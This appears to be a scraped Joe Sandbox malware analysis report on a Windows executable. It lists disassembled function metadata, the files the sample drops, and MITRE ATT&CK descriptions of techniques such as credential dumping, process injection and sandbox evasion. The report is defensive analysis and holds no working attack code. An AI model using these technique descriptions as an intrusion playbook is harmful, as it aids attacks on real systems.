Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd

Similarity

API ID: InfoItemMenu_memset
String ID: 0
API String ID: 2223754486-4108050209
Opcode ID: 751c536b083c9adfecd4a8c2834bb49aa0f4764eac95f6b1a2dda81446ac4081
Instruction ID: fa89ad59b694463807a05e008f151e0ce3f2ba89f6cc59c0a4ca2f54b8788f6f
Opcode Fuzzy Hash: 751c536b083c9adfecd4a8c2834bb49aa0f4764eac95f6b1a2dda81446ac4081
Instruction Fuzzy Hash: EA11B172A01915BACB30DA98DA44BDF73A8AB45304F044027E855B7290E7F8AD0AC79A

Function 004721D6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62networkCOMMON

Download Yara Rule

APIs

InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 0047222C
InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00472255

Strings

<local>, xrefs: 0047221D

Memory Dump Source

Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd

Similarity

API ID: Internet$OpenOption
String ID: <local>
API String ID: 942729171-4266983199
Opcode ID: 75e9458716a39df8dc3ccd06a53274ec1d022472b75fdff4666a046931244d06
Instruction ID: 87a968fd796eb7ebd351e14a87864fbf4782faaabfad8c695b3487e96fec79d3
Opcode Fuzzy Hash: 75e9458716a39df8dc3ccd06a53274ec1d022472b75fdff4666a046931244d06
Instruction Fuzzy Hash: 2C113270101221BADB248F118D84EFBFBACFF0A351F10C66BF90892200D2B49881D6F9

Function 00458E05 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00407DE1: _memmove.LIBCMT ref: 00407E22

Part of subcall function 0045AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0045AABC

SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00458E73

Strings

ListBox, xrefs: 00458E3D
ComboBox, xrefs: 00458E12

Memory Dump Source

Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd

Similarity

API ID: ClassMessageNameSend_memmove
String ID: ComboBox$ListBox
API String ID: 372448540-1403004172
Opcode ID: 5f835d864d1f62cb0e419e0b79a000cfa6bcf93be05798d2294fd29a5aacd538
Instruction ID: b8e2c670fbb7cccfe9550cd9997642be974785ccb83f9afd7f496d9e06e76b61
Opcode Fuzzy Hash: 5f835d864d1f62cb0e419e0b79a000cfa6bcf93be05798d2294fd29a5aacd538
Instruction Fuzzy Hash: 4001F971601118ABCF14FBA1CC429FE7368EF01320B100A2FBC25772D2DE39580CC655

Function 00458CFD Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00407DE1: _memmove.LIBCMT ref: 00407E22

Part of subcall function 0045AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0045AABC

SendMessageW.USER32(?,00000180,00000000,?), ref: 00458D6B

Strings

ListBox, xrefs: 00458D35
ComboBox, xrefs: 00458D0A

Memory Dump Source

Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd

Similarity

API ID: ClassMessageNameSend_memmove
String ID: ComboBox$ListBox
API String ID: 372448540-1403004172
Opcode ID: cab40d2aaf23e91ff59439cc1de985c2b62d93c46401826af07ce28494d0c59f
Instruction ID: f717951ca8db0a39ae808ededaa33f35f94e61068a96ac8ac9a889606be0a7e6
Opcode Fuzzy Hash: cab40d2aaf23e91ff59439cc1de985c2b62d93c46401826af07ce28494d0c59f
Instruction Fuzzy Hash: 1701B1B1A41108ABCF14EBA1C952AFF73A8DF15341F10042FB805772D2DE285E0CD67A

Function 00458D82 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00407DE1: _memmove.LIBCMT ref: 00407E22

Part of subcall function 0045AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0045AABC

SendMessageW.USER32(?,00000182,?,00000000), ref: 00458DEE

Strings

ListBox, xrefs: 00458DBA
ComboBox, xrefs: 00458D8F

Memory Dump Source

Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd

Similarity

API ID: ClassMessageNameSend_memmove
String ID: ComboBox$ListBox
API String ID: 372448540-1403004172
Opcode ID: 50b9cba7b0b8ee41486070134dd84a018c343db3f4f48e35959f50274b6977a3
Instruction ID: a21a4701c09283d063fe79b367182633aa51a9950eb7d0e2c1ab54a0e2954309
Opcode Fuzzy Hash: 50b9cba7b0b8ee41486070134dd84a018c343db3f4f48e35959f50274b6977a3
Instruction Fuzzy Hash: 36018FB1A41109ABDB11EAA5C942AFF77A8DF11301F20052FBC05732D3DE295E1DD67A

Function 0045C4EB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 48COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 0045C534

Part of subcall function 0045C816: _memmove.LIBCMT ref: 0045C860
Part of subcall function 0045C816: VariantInit.OLEAUT32(00000000), ref: 0045C882
Part of subcall function 0045C816: VariantCopy.OLEAUT32(00000000,?), ref: 0045C88C

VariantClear.OLEAUT32(?), ref: 0045C556

Strings

d}K, xrefs: 0045C517

Memory Dump Source

Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd

Similarity

API ID: Variant$Init$ClearCopy_memmove
String ID: d}K
API String ID: 2932060187-3405784397
Opcode ID: 9b1aca60acbf213d6da9471b2b02533c98583e4ee9509d3790eb0f545b09e1ee
Instruction ID: 9b6b4eac42ae89553be157e2085c7612e92dc5081679660b2cee5bd476f3b436
Opcode Fuzzy Hash: 9b1aca60acbf213d6da9471b2b02533c98583e4ee9509d3790eb0f545b09e1ee
Instruction Fuzzy Hash: 401130B18007089FC710DFAAC8C089AF7F8FF18314B50852FE58AD7612E734AA48CB54

Function 00464F28 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 29COMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,00000100), ref: 00464F46
_wcscmp.LIBCMT ref: 00464F58

Strings

#32770, xrefs: 00464F52

Memory Dump Source

Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd

Similarity

API ID: ClassName_wcscmp
String ID: #32770
API String ID: 2292705959-463685578
Opcode ID: 9645843bb023f01be4ce20977d6b38402124eff568dd58de57c01e48d443021a
Instruction ID: c10ae28a8aa268df33283df1156ce4f732750d60ee08a51e76ed462bd539b068
Opcode Fuzzy Hash: 9645843bb023f01be4ce20977d6b38402124eff568dd58de57c01e48d443021a
Instruction Fuzzy Hash: 91E0D13260023837E7209B55AC45FA7F7ACDB55B71F11006BFD04D3151D5649A45C7E5

Function 0043B2C1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON

Download Yara Rule

APIs

Part of subcall function 0043B314: _memset.LIBCMT ref: 0043B321

Part of subcall function 00420940: InitializeCriticalSectionAndSpinCount.KERNEL32(004C4158,00000000,004C4144,0043B2F0,?,?,?,0040100A), ref: 00420945

IsDebuggerPresent.KERNEL32(?,?,?,0040100A), ref: 0043B2F4
OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,0040100A), ref: 0043B303

Strings

ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 0043B2FE

Memory Dump Source

Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd

Similarity

API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
API String ID: 3158253471-631824599
Opcode ID: 1d2e9604d48c8e7db41109c9ed8690ec6c36f65431277a35350cc55d3018cbc9
Instruction ID: 2b780658d3da49ad9f9e4503d56df9c93059da648c8d5ac8478d33f484e7c10e
Opcode Fuzzy Hash: 1d2e9604d48c8e7db41109c9ed8690ec6c36f65431277a35350cc55d3018cbc9
Instruction Fuzzy Hash: 02E06DB02007208BD720AF29E5047467AE4EF14308F00897EE856C7341EBB8E488CBA9

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	Logon Session: Logon Session Creation, Logon Session: Logon Session Metadata, User Account: User Account Authentication
Platforms:	Azure AD, Containers, Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse the Windows service control manager to execute malicious commands or payloads. The Windows service control manager ( `services.exe` ) is an interface to manage and manipulate services.The service control manager is accessible to users via GUI components as well as system utilities such as `sc.exe` and Net .
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Traffic Flow, Process: Process Creation, Service: Service Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Driver: Driver Load, File: File Metadata, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Service: Service Creation, Service: Service Modification, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in an attempt to elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.
Tactics:	Privilege Escalation
Data Sources:	Driver: Driver Load, Process: Process Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may circumvent mechanisms designed to control elevate privileges to gain higher-level permissions. Most modern systems contain native elevation control mechanisms that are intended to limit privileges that a user can perform on a machine. Authorization has to be granted to specific users in order to perform tasks that can be considered of higher risk. An adversary can perform several methods to take advantage of built-in control mechanisms in order to escalate privileges on a system.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Modification, Windows Registry: Windows Registry Key Modification
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata, File: File Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report uG3I84bQEr.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe

C:\Users\user\AppData\Local\Temp\autF5B2.tmp

C:\Users\user\AppData\Local\Temp\autF610.tmp

C:\Users\user\AppData\Local\Temp\cyclop

C:\Users\user\AppData\Local\Temp\maneuverability

C:\Users\user\AppData\Local\Temp\z5f52P3-

C:\Users\user\AppData\Roaming\698ab73320bfb682.bin

C:\Windows\System32\AppVClient.exe

C:\Windows\System32\alg.exe

Static File Info

General

File Icon

Static PE Info

Windows Analysis Report
uG3I84bQEr.exe

Function 00403B3A Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 153
windowCOMMON

Function 004049A0 Relevance: 10.7, APIs: 7, Instructions: 223
COMMON

Function 00404E89 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 62
COMMON

Function 00469155 Relevance: 19.8, APIs: 13, Instructions: 322
fileCOMMON

Function 00403015 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 73
windowregistryCOMMON

Function 00403041 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 54
windowregistryCOMMON

Function 0040708B Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201
registryCOMMON

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may deliver payloads to remote systems by adding content to shared storage locations, such as network drives or internal code repositories. Content stored on network drives or in other shared locations may be tainted by adding malicious programs, scripts, or exploit code to otherwise valid files. Once a user opens the shared tainted content, the malicious portion can be executed to run the adversary's code on a remote system. Adversaries may use tainted shared content to move laterally.
Tactics:	Lateral Movement
Data Sources:	File: File Creation, File: File Modification, Network Share: Network Share Access, Process: Process Creation
Platforms:	Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
